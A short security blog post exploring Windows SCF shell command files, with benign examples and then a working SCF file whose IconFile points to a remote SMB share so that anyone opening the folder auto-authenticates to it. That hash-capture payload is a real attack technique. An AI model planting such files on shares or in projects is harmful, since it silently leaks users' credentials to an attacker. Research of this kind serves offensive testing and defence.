Contents

SMB/HTTP Auth Capture via SCF File

Contents

Recently saw a link to an SCF file. Didn’t know what those were so I went digging. Turns out they are a simple text based file that controls Windows Explorer. ;-)

Here are the examples I found via the references:

Open Explorer

1
2
3
4
5
[Shell] 
Command = 2 
IconFile = explorer.exe, 1
[Taskbar] 
Command = Explorer

Open “Channels” page in IE:

1
2
3
4
5
[Shell]
Command=3
IconFile=shdocvw.dll,-118
[IE]
Command=Channels

This didn’t work for me at all, probably because Internet Explorer doesn’t have “Channels” anymore.

Minimize all windows:

1
2
3
4
5
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

My first attempt to utilize this file format for fun was of course to just set the IconFile to an SMB share:

1
2
3
4
5
[Shell]
Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop

and that worked as expected, every time the share was opened, whoever opened that folder it automatically attempted to authenticate to the share that I specified. Lots easier than writing an LNK file.

My gut is telling me there is more to this file format than meets the eye, especially when there are malware writers using it as well. I haven’t been able to get my hands on one to see what they are doing inside the file, but I assume it’s not just to minimize all windows.

There are some hints that you can invoke COM objects.. who knows…

References: